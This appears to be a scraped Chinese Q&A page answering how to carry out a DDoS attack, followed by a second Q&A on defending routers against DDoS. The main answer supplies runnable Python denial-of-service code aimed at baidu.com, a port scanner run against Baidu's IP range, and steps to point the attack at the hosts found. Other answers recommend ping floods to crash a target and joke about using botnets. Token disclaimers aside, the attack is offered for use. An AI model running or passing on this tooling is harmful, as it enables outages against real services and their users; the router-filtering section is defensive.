如何进行DDOS攻击怎么做

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了如何进行DDOS攻击怎么做相关的知识,希望对你有一定的参考价值。

本人是学生想了解一下原理

会Python吗?下一个Python3.7.0-3.7.3,把代码复制下,粘贴即可

代码:


import socket

import time

import threading

#Pressure Test,ddos tool


#---------------------------

MAX_CONN=20000

PORT=80

HOST="baidu.com"#在双引号里输入对方IP或域名,要保证他联网了或开机了,这里拿百度做示范(别运行!不然后果自负!!)

PAGE="/index.php"

#---------------------------


buf=("POST %s HTTP/1.1\\r\\n"

"Host: %s\\r\\n"

"Content-Length: 10000000\\r\\n"

"Cookie: dklkt_dos_test\\r\\n"

"\\r\\n" % (PAGE,HOST))

 

socks=[]

 

def conn_thread():

    global socks

    for i in range(0,MAX_CONN):

        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

        try:

            s.connect((HOST,PORT))

            s.send(buf.encode())

            print ("Send buf OK!,conn=%d\\n"%i)

            socks.append(s)

        except Exception as ex:

            print ("Could not connect to server or send error:%s"%ex)

            time.sleep(10)

#end def

 

def send_thread():

    global socks

    while True:

        for s in socks:

            try:

                s.send("f".encode())

                #print "send OK!"

            except Exception as ex:

                print ("Send Exception:%s\\n"%ex)

                socks.remove(s)

                s.close()

        time.sleep(1)

#end def

 

conn_th=threading.Thread(target=conn_thread,args=())

send_th=threading.Thread(target=send_thread,args=())

 

conn_th.start()

send_th.start()


如果你要攻击网站,以上代码虽然可行,但是,攻击效果很不好。

所以,最好用Windows里的PING进行检测

操作:

在Windows搜索栏里输入:cmd

输入:

ping -n 10 -l 1 baidu.com

//这里拿百度做示范,别真打百度!

那么,就会发现,系统反映了:

正在 Ping baidu.com [39.156.69.79] 具有 1 字节的数据:

来自 39.156.69.79 的回复: 字节=1 时间=27ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=26ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=27ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=27ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=27ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=27ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=29ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=26ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=27ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=27ms TTL=52


39.156.69.79 的 Ping 统计信息:

    数据包: 已发送 = 10,已接收 = 10,丢失 = 0 (0% 丢失),

往返行程的估计时间(以毫秒为单位):

    最短 = 26ms,最长 = 29ms,平均 = 27ms

说明,百度的服务器有一个主服务器是39.156.69.79

那么,就来查找百度的所有服务器吧!

输入以下代码:


#绝大多数成功的网络攻击都是以端口扫描开始的,在网络安全和黑客领域,端口扫描是经常用到的技术,可以探测指定主机上是否

#开放了指定端口,进一步判断主机是否运行了某些重要的网络服务,最终判断是否存在潜在的安全漏洞,从一定意义上将也属于系统运维的范畴


#端口扫描器程序:模拟端口扫描器的工作原理,并采用多进程技术提高扫描速度

import socket

import sys

import multiprocessing

import time as t


def ports(ports_serve):

    #获取常用端口对应的服务名称

    for port in list(range(1,100))+[143,145,113,443,445,3389,8080]:

        try:

            ports_serve[port]=socket.getservbyport(port)

        except socket.error:

            pass


def ports_scan(host,ports_service):

    ports_open=[]

    try:

        sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

        #超时时间的不同会影响扫描结果的精确度

        socket.timeout(0.01)

    except socket.error:

        print('socket creation error')

        sys.exit()

    for port in ports_service:

        try:

            #尝试连接指定端口

            sock.connect((host,port))

            #记录打开的端口

            ports_open.append(port)

            sock.close()

        except socket.error:

            pass

    return ports_open


if __name__ == '__main__':

    m=multiprocessing.Manager()

    ports_service=dict()

    results=dict()

    ports(ports_service)

    #创建进程池,允许最多8个进程同时运行

    pool = multiprocessing.Pool(processes=8)

    net = '39.156.69.'#后面的IP少一个,因为要扫描这段区域内的IP,从而进行攻击

    for host_number in map(str,range(8,10)):

        host = net + host_number

        #创建一个新进程,同时记录其运行结果

        results[host] = pool.apply_async(ports_scan,(host,ports_service))

        print('starting '+host+'...')

    #关闭进程池,close()必须在join()之前调用

    pool.close()

    #等待进程池中的进程全部执行结束

    pool.join()


    #打印输出结果

    for host in results:

        print('='*30)

        print(host,'.'*10)

        for port in results[host].get():

            print(port,':',ports_service[port])

            



你会发现,Python反映了:

starting 39.156.69.8...

starting 39.156.69.9...

//并不是指百度只有这两个服务器!而是我们目前只能扫描到两个!

接着,运行DDoS攻击程序,把IP分别改为39.156.69.8和39.156.69.9

就可以实现DDoS攻击了。

//注:请不要用于违法用途,并且不要随意进行攻击。如想使用,可攻击虚拟机,但不要攻击外网IP和域名!!!

参考技术A 做人要厚道嘛,出来混,迟早是要还的
其实DDOS攻击要个软件的,你准备好了吗
如果没有,用ping也可以啊
先开N个命令提示符窗口,每个都输入:
ping 60.***.***.*** -t -l 65500
然后回车就行了
一般不到3分钟对方就死机了
参考技术B 原理就是数据包,两台计算机之间发包,网卡每秒多少包出去,你是学生要实现怎么做可以在内网做实验,不在外网做,做个好公民哦本回答被提问者采纳 参考技术C 说到DDOS(拒绝服务攻击)就是让对方的网络瘫痪
原理``就是让多台机器一起给他发送数据包
从而把他的网络给唨塞了``就造成瘫痪
前提:我们一定有足够的肉鸡(别人的电脑`通过漏洞给他种下一个马)
我们有足够的肉鸡就可以把他一次打死``哈哈
真痛快``
参考技术D 747724131 DDoS流量攻击是最常见也是最直接的一种攻击方式,攻击者通过控制大量僵尸网络肉鸡,对游戏服务器发起攻击,导致服务器拥堵直至崩溃教学

如何设置路由器上防止DDoS攻击?

路由器上如何防止DDoS攻击

1、使用 ip verfy unicast reverse-path 网络接口命令   这个功能检查每一个经过路由器的数据包。在路由器的CEF(Cisco Express Forwarding)表该数据包所到达网络接口的所有路由项中,如果没有该数据包源IP地址的路由,路由器将丢弃该数据包。例如,路由器接收到一个源IP地址为1.2.3.4的数据包,如果CEF路由表中没有为IP地址1.2.3.4提供任何路由(即反向数据包传输时所需的路由),则路由器会丢弃它。   单一地址反向传输路径转发(Unicast Reverse Path Forwarding)在ISP(局端)实现阻止SMURF攻击和其它基于IP地址伪装的攻击。这能够保护网络和客户免受来自互联网其它地方的侵扰。使用Unicast RPF需要打开路由器的"CEF swithing"或"CEF distributed switching"选项。不需要将输入接口配置为CEF交换(switching)。只要该路由器打开了CEF功能,所有独立的网络接口都可以配置为其它交换(switching)模式。RPF(反向传输路径转发)属于在一个网络接口或子接口上激活的输入端功能,处理路由器接收的数据包。 在路由器上打开CEF功能是非常重要的,因为RPF必须依靠CEF。Unicast RPF包含在支持CEF的Cisco IOS 12.0及以上版本中,但不支持Cisco IOS 11.2或11.3版本。   2、使用访问控制列表(ACL)过滤RFC 1918中列出的所有地址   参考以下例子:   interface xy   ip access-group 101 in   access-list 101 deny ip 10.0.0.0 0.255.255.255 any   access-list 101 deny ip 192.168.0.0 0.0.255.255 any   access-list 101 deny ip 172.16.0.0 0.15.255.255 any   access-list 101 permit ip any any   3、参照RFC 2267,使用访问控制列表(ACL)过滤进出报文   参考以下例子:   ISP中心 -- ISP端边界路由器 -- 客户端边界路由器 -- 客户端网络   ISP端边界路由器应该只接受源地址属于客户端网络的通信,而客户端网络则应该只接受源地址未被客户端网络过滤的通信。以下是ISP端边界路由器的访问控制列表(ACL)例子:   access-list 190 permit ip 客户端网络 客户端网络掩码 any   access-list 190 deny ip any any [log]   interface 内部网络接口 网络接口号   ip access-group 190 in   以下是客户端边界路由器的ACL例子:   access-list 187 deny ip 客户端网络 客户端网络掩码 any   access-list 187 permit ip any any   access-list 188 permit ip 客户端网络 客户端网络掩码 any   access-list 188 deny ip any any   interface 外部网络接口 网络接口号   ip access-group 187 in   ip access-group 188 out   如果打开了CEF功能,通过使用单一地址反向路径转发(Unicast RPF),能够充分地缩短访问控制列表(ACL)的长度以提高路由器性能。为了支持Unicast RPF,只需在路由器完全打开CEF;打开这个功能的网络接口并不需要是CEF交换接口。   4、使用CAR(Control Access Rate)限制ICMP数据包流量速率   参考以下例子:   interface xy   rate-limit output access-group 2020 3000000 512000 786000 conform-action   transmit exceed-action drop   access-list 2020 permit icmp any any echo-reply   请参阅IOS Essential Features 获取更详细资料。 参考技术A 1、源IP地址过滤

在ISP所有网络接入或汇聚节点对源IP地址过滤,可以有效减少或杜绝源IP地址欺骗行为,使SMURF、TCP-SYN flood等多种方式的DDoS攻击无法实施。
2、流量限制
在网络节点对某些类型的流量,如ICMP、UDP、TCP-SYN流量进行控制,将其大小限制在合理的水平,可以减轻拒绝DDoS攻击对承载网及目标网络带来的影响。
3、ACL过滤
在不影响业务的情况下,对蠕虫攻击端口和DDoS工具的控制端口的流量进行过滤。
4、TCP拦截
针对TCP-SYN flood攻击,用户侧可以考虑启用网关设备的TCP拦截功能进行抵御。由于开启TCP拦截功能可能对路由器性能有一定影响,因此在使用该功能时应综合考虑。
参考技术B 路由器设置不了的,只能用防火墙设置 参考技术C 把一些容易受攻击、没必要的服务协议号\端口号用扩展access-list根据自己的需求做一下,当然做这这些都是有利有弊. 参考技术D 补充一点,如果专业的你不懂可以下载专门的杀毒软件

以上是关于如何进行DDOS攻击怎么做的主要内容,如果未能解决你的问题,请参考以下文章

ddos攻击是啥?怎么阻止服务器被ddos?

如何有效防御DDOS攻击?

DDOS攻击网站能不能被防御呢

ddos攻击,解决办法??

怎么防御DDoS攻击?

DDoS攻击是啥?应该如何避免?